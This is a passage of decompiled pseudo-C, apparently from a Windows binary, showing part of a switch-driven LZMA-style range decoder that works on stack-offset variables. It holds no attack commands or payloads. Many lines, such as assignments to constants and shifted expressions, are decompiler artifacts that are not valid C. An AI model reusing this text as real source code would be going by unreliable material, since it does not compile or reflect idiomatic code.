                                                                                                                                                              							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                              							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                              							__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                              							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                              							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                              							if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                              								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                              								if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                              									_t98 = __ebp - 0x38;
                                                                                                                                                              									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                              									__eflags =  *_t98;
                                                                                                                                                              								} else {
                                                                                                                                                              									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                              								}
                                                                                                                                                              							} else {
                                                                                                                                                              								 *(__ebp - 0x38) = 0;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                              							if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                              								__ebx = 0;
                                                                                                                                                              								__ebx = 1;
                                                                                                                                                              								goto L61;
                                                                                                                                                              							} else {
                                                                                                                                                              								__eax =  *(__ebp - 0x14);
                                                                                                                                                              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              								}
                                                                                                                                                              								__ecx =  *(__ebp - 8);
                                                                                                                                                              								__ebx = 0;
                                                                                                                                                              								__ebx = 1;
                                                                                                                                                              								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                              								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                              								goto L41;
                                                                                                                                                              							}
                                                                                                                                                              						case 7:
                                                                                                                                                              							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                              							if( *(__ebp - 0x40) != 1) {
                                                                                                                                                              								__eax =  *(__ebp - 0x24);
                                                                                                                                                              								 *(__ebp - 0x80) = 0x16;
                                                                                                                                                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                              								__eax =  *(__ebp - 0x28);
                                                                                                                                                              								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                              								__eax =  *(__ebp - 0x2c);
                                                                                                                                                              								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                              								__eax = 0;
                                                                                                                                                              								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                              								__al = __al & 0x000000fd;
                                                                                                                                                              								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                              								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                              								__eax =  *(__ebp - 4);
                                                                                                                                                              								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								 *(__ebp - 0x58) = __eax;
                                                                                                                                                              								goto L69;
                                                                                                                                                              							}
                                                                                                                                                              							__eax =  *(__ebp - 4);
                                                                                                                                                              							__ecx =  *(__ebp - 0x38);
                                                                                                                                                              							 *(__ebp - 0x84) = 8;
                                                                                                                                                              							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              							goto L132;
                                                                                                                                                              						case 8:
                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              								__eax =  *(__ebp - 4);
                                                                                                                                                              								__ecx =  *(__ebp - 0x38);
                                                                                                                                                              								 *(__ebp - 0x84) = 0xa;
                                                                                                                                                              								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              							} else {
                                                                                                                                                              								__eax =  *(__ebp - 0x38);
                                                                                                                                                              								__ecx =  *(__ebp - 4);
                                                                                                                                                              								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                              								 *(__ebp - 0x84) = 9;
                                                                                                                                                              								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                              								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                              							}
                                                                                                                                                              							goto L132;
                                                                                                                                                              						case 9:
                                                                                                                                                              							goto L0;
                                                                                                                                                              						case 0xa:
                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              								__eax =  *(__ebp - 4);
                                                                                                                                                              								__ecx =  *(__ebp - 0x38);
                                                                                                                                                              								 *(__ebp - 0x84) = 0xb;
                                                                                                                                                              								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              								goto L132;
                                                                                                                                                              							}
                                                                                                                                                              							__eax =  *(__ebp - 0x28);
                                                                                                                                                              							goto L88;
                                                                                                                                                              						case 0xb:
                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              								__ecx =  *(__ebp - 0x24);
                                                                                                                                                              								__eax =  *(__ebp - 0x20);
                                                                                                                                                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                              							} else {
                                                                                                                                                              								__eax =  *(__ebp - 0x24);
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 0x28);
                                                                                                                                                              							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                              							L88:
                                                                                                                                                              							__ecx =  *(__ebp - 0x2c);
                                                                                                                                                              							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                              							goto L89;
                                                                                                                                                              						case 0xc:
                                                                                                                                                              							L99:
                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              								 *(__ebp - 0x88) = 0xc;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							_t334 = __ebp - 0x70;
                                                                                                                                                              							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              							__eflags =  *_t334;
                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							__eax =  *(__ebp - 0x2c);
                                                                                                                                                              							goto L101;
                                                                                                                                                              						case 0xd:
                                                                                                                                                              							L37:
                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              								 *(__ebp - 0x88) = 0xd;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							_t122 = __ebp - 0x70;
                                                                                                                                                              							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              							__eflags =  *_t122;
                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							L39:
                                                                                                                                                              							__eax =  *(__ebp - 0x40);
                                                                                                                                                              							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                              							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                              								goto L48;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = __ebx - 0x100;
                                                                                                                                                              							if(__ebx >= 0x100) {
                                                                                                                                                              								goto L54;
                                                                                                                                                              							}
                                                                                                                                                              							L41:
                                                                                                                                                              							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                              							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                              							__ecx =  *(__ebp - 0x58);
                                                                                                                                                              							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                              							 *(__ebp - 0x48) = __eax;
                                                                                                                                                              							__eax = __eax + 1;
                                                                                                                                                              							__eax = __eax << 8;
                                                                                                                                                              							__eax = __eax + __ebx;
                                                                                                                                                              							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                              							 *(__ebp - 0x54) = __esi;
                                                                                                                                                              							__edx = __ax & 0x0000ffff;
                                                                                                                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                              							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              								__cx = __ax;
                                                                                                                                                              								 *(__ebp - 0x40) = 1;
                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								__ebx = __ebx + __ebx + 1;
                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                              								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              								0x800 = 0x800 - __edx;
                                                                                                                                                              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              								goto L39;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L37;
                                                                                                                                                              							}
                                                                                                                                                              						case 0xe:
                                                                                                                                                              							L46:
                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              								 *(__ebp - 0x88) = 0xe;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							_t156 = __ebp - 0x70;
                                                                                                                                                              							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              							__eflags =  *_t156;
                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							while(1) {
                                                                                                                                                              								L48:
                                                                                                                                                              								__eflags = __ebx - 0x100;
                                                                                                                                                              								if(__ebx >= 0x100) {
                                                                                                                                                              									break;
                                                                                                                                                              								}
                                                                                                                                                              								__eax =  *(__ebp - 0x58);
                                                                                                                                                              								__edx = __ebx + __ebx;
                                                                                                                                                              								__ecx =  *(__ebp - 0x10);
                                                                                                                                                              								__esi = __edx + __eax;
                                                                                                                                                              								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              								__ax =  *__esi;
                                                                                                                                                              								 *(__ebp - 0x54) = __esi;
                                                                                                                                                              								__edi = __ax & 0x0000ffff;
                                                                                                                                                              								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              								if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              									__cx = __ax;
                                                                                                                                                              									_t170 = __edx + 1; // 0x1
                                                                                                                                                              									__ebx = _t170;
                                                                                                                                                              									__cx = __ax >> 5;
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              									 *__esi = __ax;
                                                                                                                                                              								} else {
                                                                                                                                                              									 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              									0x800 = 0x800 - __edi;
                                                                                                                                                              									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              									__ebx = __ebx + __ebx;
                                                                                                                                                              									 *__esi = __cx;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              									continue;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L46;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							L54:
                                                                                                                                                              							_t173 = __ebp - 0x34;
                                                                                                                                                              							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                              							__eflags =  *_t173;
                                                                                                                                                              							goto L55;
                                                                                                                                                              						case 0xf:
                                                                                                                                                              							L58:
                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              								 *(__ebp - 0x88) = 0xf;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							_t203 = __ebp - 0x70;
                                                                                                                                                              							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              							__eflags =  *_t203;
                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							L60:
                                                                                                                                                              							__eflags = __ebx - 0x100;
                                                                                                                                                              							if(__ebx >= 0x100) {
                                                                                                                                                              								L55:
                                                                                                                                                              								__al =  *(__ebp - 0x44);
                                                                                                                                                              								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                              								goto L56;
                                                                                                                                                              							}
                                                                                                                                                              							L61:
                                                                                                                                                              							__eax =  *(__ebp - 0x58);
                                                                                                                                                              							__edx = __ebx + __ebx;
                                                                                                                                                              							__ecx =  *(__ebp - 0x10);
                                                                                                                                                              							__esi = __edx + __eax;
                                                                                                                                                              							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                              							 *(__ebp - 0x54) = __esi;
                                                                                                                                                              							__edi = __ax & 0x0000ffff;
                                                                                                                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              								__cx = __ax;
                                                                                                                                                              								_t217 = __edx + 1; // 0x1
                                                                                                                                                              								__ebx = _t217;
                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              								0x800 = 0x800 - __edi;
                                                                                                                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              								goto L60;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L58;
                                                                                                                                                              							}
                                                                                                                                                              						case 0x10:
                                                                                                                                                              							L109:
                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              								 *(__ebp - 0x88) = 0x10;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							_t365 = __ebp - 0x70;
                                                                                                                                                              							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              							__eflags =  *_t365;
                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							goto L111;
                                                                                                                                                              						case 0x11:
                                                                                                                                                              							goto L69;
                                                                                                                                                              						case 0x12:
                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              								__eax =  *(__ebp - 0x58);
                                                                                                                                                              								 *(__ebp - 0x84) = 0x13;
                                                                                                                                                              								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                              								goto L132;
                                                                                                                                                              							}
                                                                                                                                                              							__eax =  *(__ebp - 0x4c);
                                                                                                                                                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                              							__ecx =  *(__ebp - 0x58);
                                                                                                                                                              							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                              							__eflags = __eax;
                                                                                                                                                              							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                              							goto L130;
                                                                                                                                                              						case 0x13:
                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              								_t469 = __ebp - 0x58;
                                                                                                                                                              								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                              								__eflags =  *_t469;
                                                                                                                                                              								 *(__ebp - 0x30) = 0x10;
                                                                                                                                                              								 *(__ebp - 0x40) = 8;
                                                                                                                                                              								L144:
                                                                                                                                                              								 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                              								goto L145;
                                                                                                                                                              							}
                                                                                                                                                              							__eax =  *(__ebp - 0x4c);
                                                                                                                                                              							__ecx =  *(__ebp - 0x58);
                                                                                                                                                              							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                              							 *(__ebp - 0x30) = 8;
                                                                                                                                                              							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                              							L130:
                                                                                                                                                              							 *(__ebp - 0x58) = __eax;
                                                                                                                                                              							 *(__ebp - 0x40) = 3;
                                                                                                                                                              							goto L144;
                                                                                                                                                              						case 0x14:
                                                                                                                                                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                              							__eax =  *(__ebp - 0x80);
                                                                                                                                                              							goto L140;
                                                                                                                                                              						case 0x15:
                                                                                                                                                              							__eax = 0;
                                                                                                                                                              							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                              							__al = __al & 0x000000fd;
                                                                                                                                                              							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                              							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                              							goto L120;
                                                                                                                                                              						case 0x16:
                                                                                                                                                              							__eax =  *(__ebp - 0x30);
                                                                                                                                                              							__eflags = __eax - 4;
                                                                                                                                                              							if(__eax >= 4) {
                                                                                                                                                              								_push(3);
                                                                                                                                                              								_pop(__eax);
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 4);
                                                                                                                                                              							 *(__ebp - 0x40) = 6;
                                                                                                                                                              							__eax = __eax << 7;
                                                                                                                                                              							 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                              							 *(__ebp - 0x58) = __eax;
                                                                                                                                                              							goto L145;
                                                                                                                                                              						case 0x17:
                                                                                                                                                              							L145:
                                                                                                                                                              							__eax =  *(__ebp - 0x40);
                                                                                                                                                              							 *(__ebp - 0x50) = 1;
                                                                                                                                                              							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                              							goto L149;
                                                                                                                                                              						case 0x18:
                                                                                                                                                              							L146:
                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              								 *(__ebp - 0x88) = 0x18;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							_t484 = __ebp - 0x70;
                                                                                                                                                              							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              							__eflags =  *_t484;
                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              							L148:
                                                                                                                                                              							_t487 = __ebp - 0x48;
                                                                                                                                                              							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                              							__eflags =  *_t487;
                                                                                                                                                              							L149:
                                                                                                                                                              							__eflags =  *(__ebp - 0x48);
                                                                                                                                                              							if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                              								__ecx =  *(__ebp - 0x40);
                                                                                                                                                              								__ebx =  *(__ebp - 0x50);
                                                                                                                                                              								0 = 1;
                                                                                                                                                              								__eax = 1 << __cl;
                                                                                                                                                              								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                              								__eax =  *(__ebp - 0x7c);
                                                                                                                                                              								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              								goto L140;
                                                                                                                                                              							}
                                                                                                                                                              							__eax =  *(__ebp - 0x50);
                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                              							__eax =  *(__ebp - 0x58);
                                                                                                                                                              							__esi = __edx + __eax;
                                                                                                                                                              							 *(__ebp - 0x54) = __esi;
                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                              							__edi = __ax & 0x0000ffff;
                                                                                                                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              								__cx = __ax;
                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                              								__eax = __eax - __ecx;
                                                                                                                                                              								__edx = __edx + 1;
                                                                                                                                                              								__eflags = __edx;
                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                              								 *(__ebp - 0x50) = __edx;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              								0x800 = 0x800 - __edi;
                                                                                                                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              								goto L148;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L146;
                                                                                                                                                              							}
                                                                                                                                                              						case 0x19:
                                                                                                                                                              							__eflags = __ebx - 4;
                                                                                                                                                              							if(__ebx < 4) {
                                                                                                                                                              								 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                              								L119:
                                                                                                                                                              								_t393 = __ebp - 0x2c;
                                                                                                                                                              								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                              								__eflags =  *_t393;
                                                                                                                                                              								L120:
                                                                                                                                                              								__eax =  *(__ebp - 0x2c);
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								if(__eax == 0) {
                                                                                                                                                              									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                              									goto L170;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                              								if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                              									goto L171;
                                                                                                                                                              								}
                                                                                                                                                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                              								__eax =  *(__ebp - 0x30);
                                                                                                                                                              								_t400 = __ebp - 0x60;
                                                                                                                                                              								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                              								__eflags =  *_t400;
                                                                                                                                                              								goto L123;
                                                                                                                                                              							}
                                                                                                                                                              							__ecx = __ebx;
                                                                                                                                                              							__eax = __ebx;
                                                                                                                                                              							__ecx = __ebx >> 1;
                                                                                                                                                              							__eax = __ebx & 0x00000001;
                                                                                                                                                              							__ecx = (__ebx >> 1) - 1;
                                                                                                                                                              							__al = __al | 0x00000002;
                                                                                                                                                              							__eax = (__ebx & 0x00000001) << __cl;
